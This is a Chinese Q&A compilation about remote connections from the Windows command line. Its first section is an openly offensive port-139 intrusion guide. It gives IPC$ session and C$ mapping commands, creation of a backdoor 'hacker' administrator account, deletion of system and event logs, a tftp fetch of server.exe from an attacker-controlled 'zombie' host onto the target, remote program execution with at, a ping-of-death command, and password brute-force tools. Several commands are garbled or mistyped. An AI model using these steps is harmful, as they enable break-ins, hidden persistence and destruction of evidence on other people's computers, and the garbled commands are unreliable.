1. 如何通過dos 命令連接遠程主機,連接後怎麼控制
常用的DOS命令建立到遠程主機的連接
net use \\ip\ipc$ "password"
/user:"username"
建立新用戶
net user username password /add
修改用戶密碼
net
user username newpassword
激活用戶
net user username
/active:yes
把用戶加入到用戶組
net localgroup groupname username
/add
查看遠程主機的時間
net time \\ip
顯示遠程主機的共享資源列表
net view
\\ip
啟動和停止系統服務
net start(stop) servicename
映射對方的硬碟
net use z:
\\ip\c$
啟動程序
at \\ip time programnane
文件復制
filename
\\ip\c$\filename
遠程執行FTP命令
echo open servername > c:\ftp.txt
echo
username >> c:\ftp.txt
echo password >> c:\ftp.txt
echo get
filename c:\filename >> c:\ftp.txt
ftp -s:c:\ftp.txt
del
c:\ftp.txt
刪除日誌
del c:\winnt\system32\logfiles\*.*
del
c:\winnt\ssytem32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del
c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
訪問對方共享資源
net use \\192.168.1.1\c$
/user:administrator "123"
如果提示連接成功,你在輸入
start \\192.168.1.1\c$
就打開目標機的C盤了
----------------------------------
net use \\ip\ipc$ " "
/user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use
h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$
登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del
刪除映射對方到本地的為H:的映射
net user 用戶名密碼/add 建立用戶
net user guest /active:yes
激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup
administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數
net
start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set
設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net
view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net
pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del
刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345
用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a
查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v
查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip
對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數
ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名)
向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l
65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows
NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t
以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名
加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名
加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR
*.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
#2 二:
del /S /Q 目錄
或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的文件名存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc
one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >"
是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at
id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r
在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠
遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet
將進入本機的telnet
路徑\文件名1路徑\文件名2 /y
復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$
復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.*
復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
x 要復制的文件或目錄樹目標地址\目錄名
復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe
c:\server.exe 登陸後,將「IP」的server.exe下載到目標主機c:\server.exe
參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IPput
c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠
用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route
print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway
addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp
-a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem
查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S
+H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
dir
查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、
time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set
指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元)
顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
if
在批處理程序中執行條件處理(更多說明見if命令及變數)
goto 標簽
將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)
call 路徑\批處理文件名
從批處理程序中調用另一個批處理程序 (更多說明見call /?)
for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo
信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt
在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值
設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
139埠入侵
net
命令是139埠入侵的重中之重,整個入侵過程會多次用到它。在命令行窗口下輸入net,可以看到有一大堆參數,別被這一大堆參數嚇懷了,現在我來為你一一講解。
net
use
net use
命令用於與遠程主機建立IPC$(管理)連接,當你有遠程計算機的用戶名(通常用戶名為administrator,記住它)和密碼時,在命令行窗口下輸入net
use\\IP\IPC$"password"/user:administrator,你就成功地建立了與遠程計算機的連接。在這之後,可以對其進行管理了。net
use 還有一個用處,即映射遠程機器的共享資源,輸入net use z: \\IP\C$
(注意!在此之後的一切命令都是基於第一個命令的,也就是說必須先建立IPC$連接後,這些命令才會成功),打開「我的電腦」,你會發現多了一個Z盤,裡面全是遠程主機C盤下的東西,你在Z盤里刪除了一個文件,對方C盤下的這個文件就也被刪除了,所有對Z盤的操作其實就是對遠程計算機的C
盤的操作。怎麼樣,是不是很有意思呢?
net view
net view 用於查看遠程計算機有哪些共享資源,通常你會看到my
document之類的共享文件夾,輸入net view \\IP即可。我個人認為net view
沒有太大用處,要知道,在Windows2000中,各個硬碟都是共享的,但是如果你用net view 來查看,你會發現並無C,D,E
之類的共享資源。這是為什麼呢?注意,在這之前的一些命令中,我們曾輸入過IPC$,C$這樣的奇怪東西,其實,Windows2000中,帶"$"後綴的共享資源是隱藏的,在命令行窗口下是無法看到的,Windows2000中各個盤都是以諸如C$,D$,E$
這樣的名稱共享的,所以我們看不到,但確實存在,IPC$也是如此。
net share
net share 用於開放共享,輸入net
share QQ=c:\tencent,你會發現多了一個名為QQ的共享資源。這個命令有慎么作用呢?假設一個主機安全做的不錯,關閉了IPC$,C$,D$
等共享,那麼我們就無法在139埠上建立管理連接,也無法訪問對方的C盤,當我們通過別的手段進入後(如遠程溢出),我們就可以用net share
開放IPC$,從而轉為熟悉的139埠的入侵,開放IPC$ 的命令為net share IPC$。相應的,如果你想關閉共享,你可以加上/del 後綴,例如net
share c$ /del 就關閉了C盤的共享。
net user
net user 命令用於管理主機上的用戶,僅輸入不帶任何參數的net
user 會列出計算機上所有的用戶名。現在就讓我們看看net user
命令是如何對用戶進行操作的。
┎───────────────────────────────────────────────────────┒
┃
net user hacker 12345 /add 建立一個名為hacker,密碼為12345的用戶。
┃
┃ net user hacker /del
刪除名為hacker的用戶。┃
┃ net user hacker
/active:no 禁用hacker這個用戶,這個用戶不能再登陸此計算機。┃
┃ net user hacker
/active:yes 激活已禁用的hacker這個用戶。 ┃
┃ net localgroup
administrator hacker /add 把hacker這個用戶添加進管理員組,即提升hacker的許可權,使之變為管理員 ┃
┖───────────────────────────────────────────────────────┚
net start /
net stop
net start / net stop 命令用於起動/停止系統服務,通常我們會net stop w3svc
(停止網頁服務),然後替換網頁,對此命令我不多講,知道即可。
*at 命令,net
time
之所以把它們放在一起來講,是因為at命令要用到net time命令的結果,一般我們先 net view
\\ip,得到遠程主機的時間(假設得到的時間為9:00),然後at \\ip 9:00 telnet
就啟動了telnet服務,at這個命令就是用來遠程運行程序的.
(5)需要准備的工具
肉雞獵手v1.0掃描一個網段,找出弱密碼的計算機
SMBCrack
針對特定主機,暴力猜解密碼
DameWare Mini Remote Control監控運程屏幕
CA.exe
克隆管理員賬號
2. 怎麼在dos系統中連接遠程的伺服器
修改用戶的口令是 net user +用戶名 +密碼例如要改administrator 密碼為abc123,net user administrator abc123,即可 最後問一下樓主您是什麼行業的 如果是網路行業的加我好友可以么?
3. 怎麼用DOS操作FTP伺服器
可以使用WIN98下的MS-DOS方式。
windows2000附件中的命令提示符輸入信息。
4. 獲得管理員密碼後如何通過DOS遠程登錄別人的電腦
1、遠程登錄
命令格式為:ftp
ftp伺服器ip地址。
假如我們的ftp伺服器地址為:202.102.5.211,則在ms-dos方式下鍵入命令:ftp
202.102.5.211
,按回車鍵確認。
此後會出現用戶名輸入提示:「user」,鍵入用戶名,如:「syzx123」。按回車,出現輸入密碼提示:「password」,鍵入密碼後按回車即可登錄到伺服器中。
2、瀏覽刪除目錄、文件
鍵入dir命令即可看到許可權范圍內的目錄。鍵入「rename+空格+原文件或文件夾名+空格+新文件或文件夾名」,按回車鍵確認,即可將原文件或文件夾改名。還可以像在本地機一樣用delete命令刪除文件或文件夾、利用「cd+空格+文件夾名」進入相應的文件夾瀏覽等等。當然,所有你登錄的用戶必須具有相應的許可權你的操作才有效。
3、遠程修改登錄密碼
如果你登錄的用戶具有修改密碼的許可權,那麼你可以使用如下命令修改密碼。
命令格式為:quote「site
pswd+空格+舊密碼+空格+新密碼」
按回車鍵確認後出現提示:「230
password
changed
okay」字樣,則表明修改成功。
相關命令還有很多,你可以在登錄後鍵入問號查看。多研究研究,遠程管理自己的ftp伺服器可是很方便的喲!
5. 連接遠程伺服器dos命令是什麼,就是那個運行命令後就連主機IP的那個的
運行遠程連接伺服器的命令為
mstsc
輸入後再按提示輸入IP地址帳號密碼即可
6. DOS情況下的遠程連接命令是什麼
DOS網路命令
遠程登錄命令:telnet
文件上傳下載:FTP
顯示和修改本地ARP列表:ARP
顯示和修改本地路由器命令:Route
還有Ipconfig/Winipcfg,Getmac,Nbtstat,Netstat,Ping,Tracert,Netsh,Net等
telnet
要看幫助的話鍵入telnet /?,不支持help telnet
其它詳細命令請看:
1. net user admin godmour /add 新建一個用戶名為 admin 密碼為 godmour 默認為user組成員
2. net user admin /del 將用戶名為admin的用戶刪除
3. net user admin /active:no 將用戶admin禁用
4. net user admin /active:yes 將用戶admin激活
5. net user admin 查看擁護admin用戶的情況
6. net localgroup administratros admin /add 提升用戶許可權
7. net view \\IP 查看遠程主機共享資源
8. net use x:\\IP\sharename 遠程影射本地盤符 Z (建立連接 net use \\IP\IPC$"password" /user:"name")
9. net user admin godmour 把admin的密碼修改成 godmour
10. net start servername 啟動 telnet 服務
net start servername 停止 telnet 服務tracert 61.144.56.101 查看路由是否正常工作
netstat命令
netstat [-r] [-s] [-n] [-a]。
當然,你也可以利用「netstat /?」命令來查看一下該命令的使用格式以及詳細的參數說明
netstat參數含義如下
-r 顯示本機路由表的內容
-s 顯示每個協議的使用狀態(包括TCP協議、UDP協議、IP協議)
-n 以數字表格形式顯示地址和埠
-a 顯示所有主機的埠號
運行Netstat -a命令將顯示計算機上網時與外部之間的所有連接,計算機埠與外部的連接情況等;而Netstat
-s命令則顯示電腦網路連接協議的統計信息。這樣你就可以看到當前你的電腦上網路在進行哪些連接,數據包發
送和接收的詳細情況等等
7. 遠程登陸的DOS命令是什麼
1、桌面連接命令 mstsc /v: 192.168.1.250 /console
8. 如何用DOS遠程登陸區域網內的其他電腦
登陸區域網內的其他計算機的步驟:
DOS命令net user --------查看有哪些用戶
net user guest /active:yes ------ 激活guest用戶
net user 用戶名密碼/add ------建立用戶
net localgroup administrators 用戶名 /add ------- 把「用戶」添加到管理員中使其具有管理員許可權
如果對方電腦沒有病毒的情況下只能利用防火牆漏洞。當然也可以通過遠程桌面連接進行控制。
如果對方有木馬,要進行控制的話,自己的電腦也就帶上木馬了。
9. 如何在DOS狀態下通過命令控制符登錄FTP伺服器
熟悉並靈活應用FTP的內部命令,可以收到事半功倍的效果。 FTP的命令行格式為:ftp-v-d-i-n-g[主機名]。其中: -v顯示遠程伺服器的所有響應信息; -n限制ftp的自動登錄,即不使用; .netrc文件; -d使用調試方式; -g取消全局文件名。 FTP使用的常見內部命令包括: account[password]:提供登錄遠程系統成功後訪問系統資源所需的補充口令。 bye:退出ftp會話過程。 cdremote-dir:進入遠程主機目錄。 cp:進入遠程主機目錄的父目錄。 close:中斷與遠程伺服器的ftp會話(與open對應)。 cr:使用asscii方式傳輸文件時,將回車換行轉換為回行。 eleteremote-file:刪除遠程主機文件。 dir[remote-dir][local-file]:顯示遠程主機目錄,並將結果存入本地文件local-file中。 getremote-file[local-file]:將遠程主機的文件remote-file傳至本地硬碟的local-file中。 help[cmd]:顯示ftp內部命令cmd的幫助信息,如:helpget。 ls[remote-dir][local-file]:顯示遠程目錄remote-dir,並存入本地文件local-file中。 mdelete[remote-file]:刪除遠程主機文件。 mgetremote-files:傳輸多個遠程文件。 mkdirdir-name:在遠程主機中建一目錄。 newerfile-name:如果遠程機中file-name的修改時間比本地硬碟同名文件的時間更近,則重傳該文件。 pwd:顯示遠程主機的當前工作目錄。 rmdirdir-name:刪除遠程主機目錄。 sizefile-name:顯示遠程主機文件大小,如:siteidle7200。 status:顯示當前ftp狀態。 system:顯示遠程主機的操作系統類型。 另外輸入「help」命令還能及時得到幫助信息,如果輸入?[cmd]就能得到關於[cmd]命令的相關幫助。